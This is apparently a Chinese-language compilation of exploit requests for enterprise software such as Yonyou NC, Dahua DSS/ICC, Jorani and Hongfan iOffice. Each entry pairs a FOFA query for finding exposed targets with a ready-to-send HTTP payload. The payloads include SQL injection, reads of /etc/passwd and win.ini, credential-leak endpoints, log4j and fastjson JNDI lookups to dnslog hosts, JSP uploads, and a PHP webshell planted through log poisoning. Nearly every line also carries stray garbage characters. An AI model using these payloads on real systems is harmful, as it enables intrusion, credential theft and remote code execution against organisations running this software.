; Y, L, H6 ~* o, Z0 PFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
" w4 k* A* R% v+ H- ^9 tGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1% Y* ]) M& B9 v! ?
Host: 127.0.0.1. M' P7 r( A! b1 f$ f2 Z1 G( }
Pragma: no-cache: H- P! }- ?5 Z/ k; S; T7 N5 U% g
Cache-Control: no-cache
( a9 D9 D6 p7 @6 I NUpgrade-Insecure-Requests: 1
+ c7 t( Y: m& A5 {+ b! dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' |; m5 x$ B0 r0 R& l* a8 G) M2 ^% ?' X+ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 }: O+ ?2 D7 ]8 i& o. r: {
Accept-Encoding: gzip, deflate; p( f0 B- b8 k k' d# z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8% B' b( N9 u+ @$ u4 C4 s
Connection: close+ J. M3 Z$ [& h7 h8 H5 Q4 p
4 r c e; L3 }0 d8 F, Y$ m
3 T* B5 m+ i& y4 a, T% d12. Jorani < 1.0.2 远程命令执行
3 }! r; U9 Y$ e- ?( k+ TFOFA:title="Jorani", ?# v+ o) E7 E0 H
第一步先拿到cookie# R# l. z7 w2 a9 ~) y! v5 s* }
GET /session/login HTTP/1.1. m6 `: J* ^% i/ h- _1 M" @
Host: 192.168.190.30! i* e, M5 k1 N8 O; `/ U
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.368 v2 f7 [: A/ V
Connection: close
( t; N* f3 d0 k- NAccept-Encoding: gzip+ i+ u# d2 |0 }0 j5 b
; v5 |" K6 c/ \3 S/ N
, L$ e6 N2 T( Z& m! A; s
响应中csrf_cookie_jorani用于后续请求
$ O* {2 q4 J: }* P1 }3 K% }HTTP/1.1 200 OK! H- w0 e7 n& \; k/ J5 \
Connection: close
& w# j- ~: @; r$ J0 n; hCache-Control: no-store, no-cache, must-revalidate& E3 M1 x; h; _4 L
Content-Type: text/html; charset=UTF-8$ a8 P3 q& a. X% w
Date: Tue, 24 Oct 2023 09:34:28 GMT
8 i- }" n7 f) o& f! k; i. l# ] hExpires: Thu, 19 Nov 1981 08:52:00 GMT
# G! B0 o5 L B4 G9 HLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT3 C4 l% q9 \1 V/ k3 k
Pragma: no-cache' p4 e3 P7 v1 v4 z6 z
Server: Apache/2.4.54 (Debian)# x+ ?. W& S* ^5 C& ?3 ?
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/) B8 W5 k4 q# k
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly( F, c* Q X5 P" A4 \0 W. r2 U
Vary: Accept-Encoding
2 b; J9 T/ M* T/ c9 y0 [. Z0 y+ S! Y k/ Y0 j `5 J. u4 D( ]
. I+ k3 G, E3 N+ B7 H9 bPOST请求,执行函数并进行base64编码& A% M0 F. U5 H, R( O" V, q
POST /session/login HTTP/1.1, p7 O7 t5 O3 L( Z$ p9 i1 z* X
Host: 192.168.190.307 G; q3 r/ n. {0 I# f5 l. o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% M+ C; q% @5 d dConnection: close7 f g+ ], l6 L' n1 ]: @4 P% M
Content-Length: 252
3 ~# r# A& L: K ^3 G n$ c, C6 lContent-Type: application/x-www-form-urlencoded
c( l6 T- n7 }6 O9 W6 pCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r+ {% b. X8 X, z) H' [1 V# ]1 y
Accept-Encoding: gzip
2 s) d, E! T/ `# M1 F/ ^/ \3 N" y: q$ \2 }. V# V, o
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor8 k4 \' B: N8 `+ K$ e7 [/ X. a: J
( Y0 h1 F% t% j/ M/ O$ c! i/ R
- |0 L5 }3 q6 \$ r* H' B" B
- ?, k& w, B/ \; V: Y向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串+ W% G8 r+ G3 k
GET /pages/view/log-2023-10-24 HTTP/1.1
5 O5 L. ^; G9 c2 d" B, D2 B$ k2 GHost: 192.168.190.30
$ v' R8 C W1 A* xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# v( v% ?) [- \8 r: hConnection: close
+ g: ]) ~! v/ t8 k8 a vCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
1 _) k0 k: r, K' i% a# x: @K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
8 k2 k# c3 X! `1 F) U" @X-REQUESTED-WITH: XMLHttpRequest
: p% c5 k* m4 D* o6 K9 u1 y# vAccept-Encoding: gzip( q, X0 X, z/ I3 a, j+ ]( P
0 s# y% T( k) H9 L9 o
; L$ o5 p3 c- e' s3 L+ J2 v! w, d7 G, A13. 红帆iOffice ioFileDown任意文件读取
2 `' T; v6 r- ^7 J# nFOFA:app="红帆-ioffice"
$ l, [1 I6 W+ b# y0 E4 w! XGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.14 H6 t# P4 p; S7 p
Host: x.x.x.x+ a0 r) e2 E0 T% J. {" _( M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 `- O3 ] p3 }4 A
Connection: close& I* ~1 k8 p' @( N: p
Accept: */*
9 j- ]4 w, x$ k( y- R7 [Accept-Encoding: gzip3 J7 H( C$ u+ v+ ]
2 b- c# R( p5 a/ M; c4 Z6 m9 y: _. C* |
: `$ f, H! f5 b2 @9 f4 L14. 华夏ERP(jshERP)敏感信息泄露5 D4 [" A( W; B! r- a
FOFA:body="jshERP-boot"
# L1 e2 }1 M& p3 o- P9 N1 H- ^泄露内容包括用户名密码
, u# J# J* t6 c) S+ BGET /jshERP-boot/user/getAllList;.ico HTTP/1.19 @) l9 R9 Q+ L5 j! Q; T' K9 y4 h
Host: x.x.x.x- p0 [- o: `8 y% a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36( a0 x5 g- H2 k3 Q( ^5 S4 v# _5 q
Connection: close- E* s g5 _$ q& f6 K1 _$ G
Accept: */*
" }& X4 t( e( f% gAccept-Language: en
0 E6 W& f; H' M1 e/ WAccept-Encoding: gzip
" O+ o' Y" R. o
1 t W0 ^1 D- b# X8 _& ^& I3 r0 a1 `
+ x* V, {8 f3 ?. U, ? j) M15. 华夏ERP getAllList信息泄露
0 j4 X+ q+ r9 |0 \# r: U( {2 bCVE-2024-04901 l* c9 A1 f6 L1 @6 l( r, ]
FOFA:body="jshERP-boot"
. K% ]- u4 C2 x* f% Q泄露内容包括用户名密码0 [8 D/ C- J1 U- V+ R
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" Z6 \8 _6 J6 g% }+ W* t% G: H, F0 i
Host: 192.168.40.130:100
C% q8 u! P0 P! S( PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36, d8 x" t1 }5 K2 O# s& J" y7 q
Connection: close0 U; d G1 y1 Q/ V' m; |1 O/ F: a
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.80 X" L# m" ~8 p6 G" h
Accept-Language: en
! s0 W8 Z0 K$ \9 U' a+ i: S9 Wsec-ch-ua-platform: Windows
( }* D" P& C2 wAccept-Encoding: gzip' @; b5 k$ W9 A- N+ H; m4 i
# A+ j/ F2 e9 m% v5 m
' J2 P2 E# d8 ~, Z' l' e+ P0 g16. 红帆HFOffice医微云SQL注入) ^, Y2 N5 `) t! q: i2 W
FOFA:title="HFOffice"* L; p% a! \8 V4 p
poc中调用函数计算1234的md5值& t+ c. ^5 r/ n' l' q/ x( `" {. o
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.11 }+ i @3 Y8 j& I
Host: x.x.x.x
: B* n% W Q3 \User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
( p9 Y# }8 C* t7 Q" ~! |Connection: close! d; x3 l4 y: j- p
Accept: */*
8 t) A$ `9 K8 |$ YAccept-Language: en
, u6 U: F. A/ L; y( l6 |Accept-Encoding: gzip: W8 R+ E9 }7 m6 [1 P
+ [% {7 \" f( }
8 E+ C5 ]0 A3 G! x8 {17. 大华 DSS itcBulletin SQL 注入$ {* M1 l+ }8 X. n8 D4 M8 ?1 b
FOFA:app="dahua-DSS"/ I' W- ?4 v: w
POST /portal/services/itcBulletin?wsdl HTTP/1.1; R' K M% v( c$ B# a( v& E; B
Host: x.x.x.x
- U4 _5 G' O, {8 `! E8 D' Z, @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' p& J5 }; O8 q0 `
Connection: close
. r9 D9 J' }* x+ Y" w9 R8 ~4 x- dContent-Length: 3458 @2 l" U* s: X* q& U; m
Accept-Encoding: gzip
9 @$ h3 W' r9 o6 r% E6 z9 y3 d4 d* u- B8 D+ h: e
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>8 m# W8 ^* v- Q( v! J% Y
<s11:Body>" e7 a3 B( D9 C0 D8 b' @7 G: `
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>8 d( Z* t3 Z Z# t2 H. B2 t
<netMarkings>
) r2 R. D1 b+ v) {8 o6 V3 l4 m" _ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1* G$ ~1 X A! _3 ^
</netMarkings>$ K( P; \& y0 x: d' X7 x" ~8 |
</ns1:deleteBulletin>* w0 P/ ?3 L) E. C3 F" R* v
</s11:Body>4 {1 j6 T6 P6 D5 R+ z. _
</s11:Envelope>) F- q7 ]) K+ ]2 |4 b
# j% a/ k2 l) u# y+ O
2 \; b- ^% v, t, m8 r
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露$ T8 H( n. F& t" \7 z) k! }! b
FOFA:app="dahua-DSS"
8 O8 M8 E& K: r% \, Q2 B9 UGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
; \ ~4 k; g$ V6 i8 g4 FHost: your-ip
9 n9 Y$ ?/ s3 y+ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: E& E: ~' ~- C& K& NAccept-Encoding: gzip, deflate
" T2 w6 v3 Z4 I! k* @9 C9 \3 qAccept: */*7 R' t5 y6 I- _7 L4 n5 a
Connection: keep-alive' T1 e% O1 U* s# F; l
, p3 C1 n; C; @
/ I" _7 o- S! L$ k5 w: e5 x
/ U/ m6 A$ c. g5 v# [19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
# b9 D& G& W- Y1 c5 v$ PFOFA:app="dahua-DSS"( a9 z0 S# o }3 k
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
1 E& }! _7 N2 H R, mHost:
! g# s. l! f& N$ vUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) \# g% U" K, K& U) C! x* ~2 [) AAccept-Encoding: gzip, deflate
M u0 u$ V6 m- k1 z" t. UAccept: */*
+ l8 v, y( I* Y) TConnection: keep-alive. ]3 h+ I& e7 O$ V+ E
: w& H% S# Q9 O: J2 C/ R
6 s) S( c* t, I5 v& v& i20. 大华ICC智能物联综合管理平台任意文件读取' @" C! s' H' @* a
FOFA:body="*客户端会小于800*"/ I1 @, N, f& X( Y$ h6 |
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1* J8 ~! ~7 m2 k) }! C) p+ u
Host: x.x.x.x0 ]3 u) a; O: c4 D5 n: g6 Z
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' D( Y: s' }* m
Connection: close
0 e# r+ x% M5 J1 L/ t. uAccept: */*
2 B0 {4 k7 T6 ` HAccept-Language: en
( u: J( s; s# T6 J! N% } R1 p0 h: cAccept-Encoding: gzip
* {- R5 I3 d% c7 f; K& ^9 d
: F# V6 D. m3 j* f2 q9 Y% d0 `' E+ j+ u6 ^/ Y4 Q& A
21. 大华ICC智能物联综合管理平台random远程代码执行5 h3 ]0 @7 h' B, h6 @+ q+ x
FOFA:icon_hash="-1935899595"
+ i, X$ E6 b. M' K: SPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 U: L/ m" E1 n) \2 Y% B. ?
Host: x.x.x.x4 O1 }8 i( c ?+ @. |: }& m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 S! S" i+ C- kContent-Length: 161% v4 h' ^- C4 {' P* S! u
Accept-Encoding: gzip
& B9 r' }4 P. |2 qConnection: close& Q9 B4 U0 X$ |. x; B2 a
Content-Type: application/json;charset=utf-8# ?2 T: i. K) f1 D
9 w1 l' b5 D' A- L( r% D+ i3 q
{2 y9 ~4 v" O' N- m
"a":{2 h5 V" K# k* N2 n0 N9 G
"@type":"com.alibaba.fastjson.JSONObject",7 E( Q# t+ q* N. E/ v
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}3 x, }: ?& B+ L: W# S2 }
}"", g; r# s/ p$ F
}
$ _' s. s7 O% L6 }( I9 k6 f0 F7 j/ x
; [/ l- v3 p" f' c
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" p) u' O! i, t. K" WFOFA:icon_hash="-1935899595"3 F- }9 T- q1 J+ u; [: i
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1; U1 S5 l1 g, d, d; @; f
Host: your-ip
# r) X$ Z6 X7 W$ ?4 B1 \# g1 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( m. Y2 q1 u U# y2 _ w! OContent-Type: application/json;charset=utf-8' O' X3 c8 j( R) q$ E: h
' g" | o: k# W d{ P# n! A( e( z3 T1 E; d
"loginName":"${jndi:ldap://dnslog}"
" @1 X' E; m' T' w}
4 S- Z; W5 F3 _0 m: H
. u+ ]8 _) E" r. O; Q2 s
( j7 d j p% v6 D* H
N# U; ~/ |' d" e23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 u% E' L( q. R- j) _& _FOFA:icon_hash="-1935899595"1 b7 R1 u' R# a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( T0 M: {. x$ `3 wHost: your-ip* C& }0 F8 ]- ?$ W1 z# ^* q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 w4 l/ \$ ?& V- O" @+ A1 mContent-Type: application/json;charset=utf-8. n4 n* Z; W0 T J
Accept-Encoding: gzip( f4 j. R* I- @) U4 H3 x
Connection: close
; P) a% {. n {! a* B, C) ^: T& T6 c" A: x$ m& Z
{
* P; c- X! B4 N6 I1 l$ ` "a":{
' r! d6 l1 {+ a7 H "@type":"com.alibaba.fastjson.JSONObject",
6 f/ P" e2 q0 v {"@type":"java.net.URL","val":"http://DNSLOG"}: {1 L/ u$ D8 c8 ]9 ^8 v ]) B
}""6 K& w. a- a% E5 r @' k
}
4 Q$ |1 e& x2 t* _
: a" `5 M6 n5 A
9 ]! A% z9 H8 b4 U( Y24. 用友NC 6.5 accept.jsp任意文件上传9 |$ @. a! X7 K3 L* j. \& E
FOFA:icon_hash="1085941792"$ k& Y3 T' z1 b+ q J* y
POST /aim/equipmap/accept.jsp HTTP/1.18 X5 l" D& I$ s/ r) I6 s2 I
Host: x.x.x.x
, a9 j' V4 o0 }7 g. kUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.364 n7 `7 b, f; m8 Y- b
Connection: close1 A( ?8 H: {' a6 _2 G* R
Content-Length: 449
: O/ M4 z: H' I: N+ PAccept: */*5 y5 v6 C( o0 Z; L6 d( o3 w
Accept-Encoding: gzip
, {% u, G o5 C. G* I. b7 |! Q! n, nContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
* J6 w# B% y) g# ~3 S' U2 z' ?" D6 ^( T8 [7 T" {( ]
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc+ ^" U; [* _9 x `
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
' y5 _" r, o: cContent-Type: text/plain
6 e& V" G- U; G0 r O2 z# \6 V7 [0 m: M3 g. i/ m. j. E
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
( l! R& b- C7 j! R7 F-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! r5 W9 b9 g! u3 b
Content-Disposition: form-data; name="fname"
; r/ f) L! f( Y0 h) t8 Z+ v$ b: M0 S4 D6 z, c2 q2 [( Z, A, X8 Z
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
) R5 }1 _/ G$ ~3 m3 s-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
5 T" k, s5 \6 R% U) `: x/ J( I+ l8 L
! `& G* ?( r7 R3 F
25. 用友NC registerServlet JNDI 远程代码执行
, q t) c6 K$ [: N5 g) }* wFOFA:app="用友-UFIDA-NC"
* E2 D0 L' I0 tPOST /portal/registerServlet HTTP/1.1
0 _; p s4 j8 d5 Q( m) c+ KHost: your-ip- Q. [3 q8 j) o c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0! c( \- p$ ~7 U' P/ g/ R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
+ o' t' u. P+ b' J/ [Accept-Encoding: gzip, deflate: X$ B0 H0 y$ o) ]5 A# a
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6; b2 E I! l2 @
Content-Type: application/x-www-form-urlencoded8 C; q7 T8 N& j4 R
3 j$ G) V7 k, I- f% a# U' c% B
type=1&dsname=ldap://dnslog' p0 W4 \4 t* o2 L/ M; Z
9 ?: C y0 h: q
& {4 i* ?# l8 Q0 C( N; `) W9 n4 y9 R T$ s
26. 用友NC linkVoucher SQL注入
, j' `, H% e2 q) ?9 C0 F: S$ [7 |" ~% PFOFA:app="用友-UFIDA-NC"/ c. B s Q2 \, O$ w0 X2 z! R! H
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.13 d- i# J+ t. v5 l: ?( i6 L
Host: your-ip0 _5 R! \) b/ b, ]$ `; R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% `2 b2 w# ~- V5 p1 w! f% q
Content-Type: application/x-www-form-urlencoded; c4 A0 ^# @) `. I# S8 b
Accept-Encoding: gzip, deflate
. K2 ?9 U c8 H. J/ B) ?( IAccept: */*
+ d0 i! y7 e9 Q6 G* KConnection: keep-alive$ _3 `4 k, M* _3 K3 b
4 ~( ?( @0 `$ d# f% @5 I; s
" d+ `" g7 ~' o+ X2 d27. 用友 NC showcontent SQL注入) t' x9 D4 @3 D( }/ ] `7 F7 C
FOFA:icon_hash="1085941792"
$ e2 m% B: V) J4 z' f' x4 O u% [$ iGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1( S% S2 ?: L+ c7 J8 i
Host: your-ip- b% R0 q1 k- C# _+ s$ ^1 y$ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 U6 ]( c5 d- F! s4 zAccept-Encoding: identity5 Y4 E* L3 ?: n1 |
Connection: close! u; X. |1 Y- Y) i0 K' m% N
Content-Type: text/xml; charset=utf-8& \/ j* N3 e/ O1 }, ?1 n
- i. n$ w. | e9 O: I: d7 W% a, G
( L" R( d0 D4 F
28. 用友NC grouptemplet 任意文件上传2 d0 f" Q* `$ o( s) `
FOFA:icon_hash="1085941792"
0 B' }8 |5 Z$ ~; K- FPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
/ Q. J0 L8 ?( t/ \6 _Host: x.x.x.x1 e' H1 T; D' I; ~6 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36/ H2 r. b) {0 f+ W# p( T: z
Connection: close6 z* ~& p# K- f/ I* N9 I
Content-Length: 2683 X" m& J9 J/ A( t) i3 Z
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
" f3 b& E8 r. |' e; S8 E6 L/ C: LAccept-Encoding: gzip4 A" M! Z3 a: a3 q; o3 K/ U5 n2 Q
) E3 U% r& o2 T! L3 M
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk* ~4 [% s% i! E* f* X4 y
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
7 \! |/ U" ]* d2 ~6 qContent-Type: application/octet-stream, L0 R& R& J& H9 B" s7 `
# Y P( {' v- `/ ^( D
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
- Y% Z) R3 n" Y5 G# K------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
4 ^! @; ?, y! g- G A& v
+ D5 }8 G5 x5 o+ [0 @7 Y7 P- @/ p6 q% w' L* t& R
/uapim/static/pages/nc/head.jsp
. Y, l' [+ k9 f! ]! W, e+ v8 a
, [4 X9 ]# d8 [* f _8 k0 B29. 用友NC down/bill SQL注入
- T3 Q2 s( k7 C1 o9 p" eFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
/ v' c. C/ F8 D* m( h7 {GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.10 n# z/ n' Z) t9 E$ d' A& Q
Host: your-ip
+ ]: q0 m, w# t8 D) Q6 E4 |$ l" wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 X8 g1 ^4 c" zContent-Type: application/x-www-form-urlencoded1 A5 I( A2 `- O
Accept-Encoding: gzip, deflate* S0 ~' M2 v% Z% |
Accept: */* \# i5 j; S9 z" O
Connection: keep-alive
+ G2 ] Z7 s$ c* P8 A1 {8 g" f2 U7 A! X5 m/ [: B0 V G
' ~4 }+ ?( X X5 l# c5 L# V- x
30. 用友NC importPml SQL注入5 L& [2 a1 ^# a4 X* ]
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"- r2 Y8 P, K4 h: M2 f$ F+ h
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1' F+ e1 G. H j
Host: your-ip
+ a) y* e# r4 M3 Z) o- W$ _Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V6 y# Y& G" c" N; k! J$ ?( L# }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36( v* i9 k3 D' ?
Connection: close
: X0 m, |. B( d! C* t% b/ A& A
4 @7 J6 \9 }7 y2 x' G0 x------WebKitFormBoundaryH970hbttBhoCyj9V6 y7 Z1 S# }* U! m7 d! ^
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
# M/ s/ r4 \5 R$ [Content-Type: image/jpeg Z w, a. d: Q3 w- o9 ]
------WebKitFormBoundaryH970hbttBhoCyj9V--1 R4 u- m- u/ `; @/ X1 C- Y; i
9 P; `# _" |0 K/ o7 E% S2 E
) l9 ^. p1 H+ H1 F f31. 用友NC runStateServlet SQL注入! Q) d( |$ n/ g
version<=6.5, w! `- C6 I" T6 T( u' Q' k1 A
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
8 n2 Y5 T( o1 K, \6 `GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( c L T* g0 l- ^% PHost: host' J8 N7 ^: z4 p) W- Z0 ]* X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 z/ b$ t! K2 ~: G- |. G$ U2 wContent-Type: application/x-www-form-urlencoded1 Q7 Z4 X8 l+ N, u5 E
0 @: e% X8 B' l2 F6 y! t. Z, c
9 r) M9 u8 F: H, R$ v32. 用友NC complainbilldetail SQL注入
H) r; X+ l6 \2 D8 _version= NC633、NC65
5 g X5 g/ F* gFOFA:app="用友-UFIDA-NC"! w4 I8 @; ?' B9 s! h9 f/ S3 ^
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1! }' l# |# Z" v+ V8 h
Host: your-ip
6 {; j6 |" I. Q1 S9 c% i4 N2 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 k# s4 W2 e1 t' s9 R( L
Content-Type: application/x-www-form-urlencoded
; a4 @% R: v4 C3 Z! M: v) \/ wAccept-Encoding: gzip, deflate) H% W8 Z* L2 X, h
Accept: */*4 s) ~* Y s5 C5 { h
Connection: keep-alive. R4 J% h7 m2 }% h7 v8 j V! I
3 U+ {; g& ]0 f1 F3 `5 A& x( A% p
6 n$ k) _2 S& z, L
33. 用友NC downTax/download SQL注入
( s9 D: l4 U* c8 F. @3 B& ~version:NC6.5FOFA:app="用友-UFIDA-NC"7 N2 n- ]. ?/ N# y8 G
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. N# c! }8 }4 E1 ]) s5 M$ @3 }8 [' QHost: your-ip0 n% O0 a6 r$ U/ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 D, Z. x% S& C! x
Content-Type: application/x-www-form-urlencoded' Y' k3 t K4 ]5 f
Accept-Encoding: gzip, deflate
$ {: d0 _( q% i1 Y& g& a oAccept: */*
; p! X5 k- s- ?* D4 F3 I+ J( rConnection: keep-alive* {: Q: a' ^) ^( N
3 y2 b! E6 L0 K: X
# G3 v7 r9 \1 k, c" D$ R" z34. 用友NC warningDetailInfo接口SQL注入! V" \" X' q1 b& f ^2 _
FOFA:app="用友-UFIDA-NC"7 D* }9 ~4 \& m6 s
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.10 `% X A+ s. `2 |9 o, G; p
Host: your-ip1 `. g; S5 f4 I! I( K& s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 ?. _$ l% R5 ]9 ?% S2 P- vContent-Type: application/x-www-form-urlencoded% d# \! m1 ~2 l+ `
